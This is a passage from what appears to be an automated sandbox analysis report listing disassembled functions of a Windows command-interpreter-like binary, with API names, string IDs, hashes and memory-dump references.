                                                                                                          • API ID: AttributesFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 3188754299-0
                                                                                                          • Opcode ID: 41fbdc0f45981392a8be1ae3f0b798cbf48c2336bf4ed7969cfd2cedfd2f237f
                                                                                                          • Instruction ID: 4753085cfb10e0c6524431fcf01ec9e4f3174c543bced183ac7098c382715b1b
                                                                                                          • Opcode Fuzzy Hash: 41fbdc0f45981392a8be1ae3f0b798cbf48c2336bf4ed7969cfd2cedfd2f237f
                                                                                                          • Instruction Fuzzy Hash: D191C27260A6828AEB26AF2CF4502F9BAA0FB45748F864135DA4E477B4EF3CD545D210
                                                                                                          Function 00007FF7AB12B0D8 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 320COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _get_osfhandlememset$wcschr
                                                                                                          • String ID: DPATH
                                                                                                          • API String ID: 3260997497-2010427443
                                                                                                          • Opcode ID: 3d336d0508f9d51260e4716dc0b75001e2ca59ffb0876634830191a582af1c3b
                                                                                                          • Instruction ID: fa0974ff6e9740c27ee19cfe37be822cb5305316cab778d46c36d4976ae5e575
                                                                                                          • Opcode Fuzzy Hash: 3d336d0508f9d51260e4716dc0b75001e2ca59ffb0876634830191a582af1c3b
                                                                                                          • Instruction Fuzzy Hash: 94D18222A0A642C6EB56BB2DF4401BEA2A1FF44B5CF864235D91D477F4DF3CE8468760
                                                                                                          Function 00007FF7AB137FF8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 87filenativeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                                                                                          • String ID: @P
                                                                                                          • API String ID: 1801357106-3670739982
                                                                                                          • Opcode ID: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                                                          • Instruction ID: 1222b1d4c752df1c16dad4416691c07a5dbb6757c9799a8087a7eb469bd12929
                                                                                                          • Opcode Fuzzy Hash: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                                                          • Instruction Fuzzy Hash: 25416F32B05A41DEE711AF69E4842EDBBA0FB8974CF854231DA0E43AA8DF78D548C750
                                                                                                          Function 00007FF7AB122220 Relevance: 15.4, APIs: 10, Instructions: 368COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$BufferConsoleInfoScreen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1034426908-0
                                                                                                          • Opcode ID: 64486a4b6b13c1c8e977e62f0f94e25a0603b25ea896dd7b7fc126d69d5cd52d
                                                                                                          • Instruction ID: 6d0e19aa3494375631db1fa71028086cb38db5f585360a04237ac4d7fe6e7460
                                                                                                          • Opcode Fuzzy Hash: 64486a4b6b13c1c8e977e62f0f94e25a0603b25ea896dd7b7fc126d69d5cd52d
                                                                                                          • Instruction Fuzzy Hash: D1F19F32A0A782CAEB66EB29E8402E9B7A4FF4574CF854134DA4E476B5DF3CE504C750
                                                                                                          Function 00007FF7AB14AC4C Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 194registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseValue$CreateDeleteOpen
                                                                                                          • String ID: %s=%s$\Shell\Open\Command
                                                                                                          • API String ID: 4081037667-3301834661
                                                                                                          • Opcode ID: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                                                                          • Instruction ID: f1f25ab05c201e3b50fcbd3885ddd4e56566b1169fc898eb6111074bd6a213a3
                                                                                                          • Opcode Fuzzy Hash: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                                                                          • Instruction Fuzzy Hash: 4271C7B1B1AB8286EB526B1DF0502BAE2A1FF45758FC64131DA4E477B4EF3CD5818720
                                                                                                          Function 00007FF7AB14AA30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 123registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7AB14AA85
                                                                                                          • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7AB14AACF
                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7AB14AAEC
                                                                                                          • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7AB1498C0), ref: 00007FF7AB14AB39
                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7AB1498C0), ref: 00007FF7AB14AB6F
                                                                                                          • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7AB1498C0), ref: 00007FF7AB14ABA4
                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7AB1498C0), ref: 00007FF7AB14ABCB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseDeleteValue$CreateOpen
                                                                                                          • String ID: %s=%s
                                                                                                          • API String ID: 1019019434-1087296587
                                                                                                          • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                                                          • Instruction ID: 5e6bd4a2b7bc8c993e963dcefb3ef154fa1fe351e37d19695b7c1ddbab432b68
                                                                                                          • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                                                          • Instruction Fuzzy Hash: 4C51C771B1978286E761AB2DF44077AF691FB89784F824234CE4D437B4EF78D4818B10
                                                                                                          Function 00007FF7AB121884 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 380COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsnicmpwcsrchr
                                                                                                          • String ID: COPYCMD
                                                                                                          • API String ID: 2429825313-3727491224
                                                                                                          • Opcode ID: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                                                                          • Instruction ID: a85cece1efcf5e2a32b95e9e21596af4d73a9e53a6d7c569c0f26679065baa2a
                                                                                                          • Opcode Fuzzy Hash: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                                                                          • Instruction Fuzzy Hash: 3FF1B472F0A642C5FB62EF59F0442BDA2B1AB0479CF864235CE5D136B4EE3CA551D360
                                                                                                          Function 00007FF7AB124A30 Relevance: 10.8, APIs: 7, Instructions: 318COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$FullNamePathwcsrchr
                                                                                                          • String ID:
                                                                                                          • API String ID: 4289998964-0
                                                                                                          • Opcode ID: f574b9b165fedc960487e474b398108792cb4fddced71d8a368933aba93db8fb
                                                                                                          • Instruction ID: 19456e6b5e4af8525c237754dfb3844418d49ce046f0a20b57112e50843dc9dd
                                                                                                          • Opcode Fuzzy Hash: f574b9b165fedc960487e474b398108792cb4fddced71d8a368933aba93db8fb
                                                                                                          • Instruction Fuzzy Hash: 03C1EA59B1B35682EA56BB59F548378E3A0FB45B98F825530CE0E077F0EF3CA4918760
                                                                                                          Function 00007FF7AB14BCF0 Relevance: 10.6, APIs: 7, Instructions: 52filenativeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 3476366620-0
                                                                                                          • Opcode ID: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                                                          • Instruction ID: 7e07dabb1ab63d06820df1fed5267e62a251eb80e05138a27e63b176ba721d33
                                                                                                          • Opcode Fuzzy Hash: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                                                          • Instruction Fuzzy Hash: 7F21716090BA4386EA167B2CF8952B9FA50FF4971DFC64275C41F432F1EF3DA4088620
                                                                                                          Function 00007FF7AB123D94 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110nativeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                                                                                                          • String ID: %9d
                                                                                                          • API String ID: 1006866328-2241623522
                                                                                                          • Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                                          • Instruction ID: a945f27ce8cf3c8a4c779016281daee2c069876f3b4a72f542cbf430034c5537
                                                                                                          • Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                                          • Instruction Fuzzy Hash: CA518472A0A642CAE701EF19F8505A8BBA0FB4875CF824635DA6D537B5DF3CE544CB20
                                                                                                          Function 00007FF7AB128DF8 Relevance: 7.8, APIs: 5, Instructions: 281COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 2221118986-0
                                                                                                          • Opcode ID: 1a4803f2d100bf75eb873e70d7f896504ce2af50745e4dff0b3b1325a9c43adf
                                                                                                          • Instruction ID: 7e9fdfc6905488d9df59b6d32fe3739cbeaefa32a00e85c3a06fe23477aed86a
                                                                                                          • Opcode Fuzzy Hash: 1a4803f2d100bf75eb873e70d7f896504ce2af50745e4dff0b3b1325a9c43adf
                                                                                                          • Instruction Fuzzy Hash: D8C1F622A0A782C6EB66EB19F8906F9A7A4FF5578CF864131DA1D077B4EF3CD5448310
                                                                                                          Function 00007FF7AB129B50 Relevance: 7.8, APIs: 5, Instructions: 252COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$AllocProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 1617791916-0
                                                                                                          • Opcode ID: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                                                          • Instruction ID: b6c74b2d07e88b0715cad910373ad56d90adff6bfe7daaebf43208927358bc43
                                                                                                          • Opcode Fuzzy Hash: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                                                          • Instruction Fuzzy Hash: 72A1E521A1A646C5EB56BB1DF45167AA6A1FF88788FC24135DD4E837B4EF3CE401C320
                                                                                                          Function 00007FF7AB14FB54 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$DiskFreeSpace
                                                                                                          • String ID: %5lu
                                                                                                          • API String ID: 2448137811-2100233843
                                                                                                          • Opcode ID: 91b9902f1ee4f2c69dd88f1cc13d7b02493769e4bbf5f2682aca5e24acde37c3
                                                                                                          • Instruction ID: 29d018fb74b7e924bc73830284a0ec934adda2662e2644f7277845cdf0ea8951
                                                                                                          • Opcode Fuzzy Hash: 91b9902f1ee4f2c69dd88f1cc13d7b02493769e4bbf5f2682aca5e24acde37c3
                                                                                                          • Instruction Fuzzy Hash: A8418F7270AAC185EB62EF19F8446EAB760FB85788F818135DA4D0B768DF7CD249C710
                                                                                                          Function 00007FF7AB12D250 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsicmp
                                                                                                          • String ID: GeToken: (%x) '%s'
                                                                                                          • API String ID: 2081463915-1994581435
                                                                                                          • Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                                                          • Instruction ID: b7790ac1f29774908eb7533cfa197f28e1c4bdf2feca3932fc55403e5691b631
                                                                                                          • Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                                                          • Instruction Fuzzy Hash: 1271AA22E0B247C5FB67BB2CF454675A6A4AF0474CFD60939D90E426F0EF3CA8918761
                                                                                                          Function 00007FF7AB1281D4 Relevance: 4.8, APIs: 3, Instructions: 299COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcschr
                                                                                                          • String ID:
                                                                                                          • API String ID: 1497570035-0
                                                                                                          • Opcode ID: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                                                                                          • Instruction ID: c6e6a1264ef3675dd99aeaaebffbc1cf1888c5e5b83c9b9184b2a33a25cbf509
                                                                                                          • Opcode Fuzzy Hash: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                                                                                          • Instruction Fuzzy Hash: E0C1F921A0A642C2EA56BB1DF4502BAE7A0FF8478CF864135DA4E476F5FE3CE4458720
                                                                                                          Function 00007FF7AB147B4C Relevance: 4.8, APIs: 3, Instructions: 269fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                          • String ID:
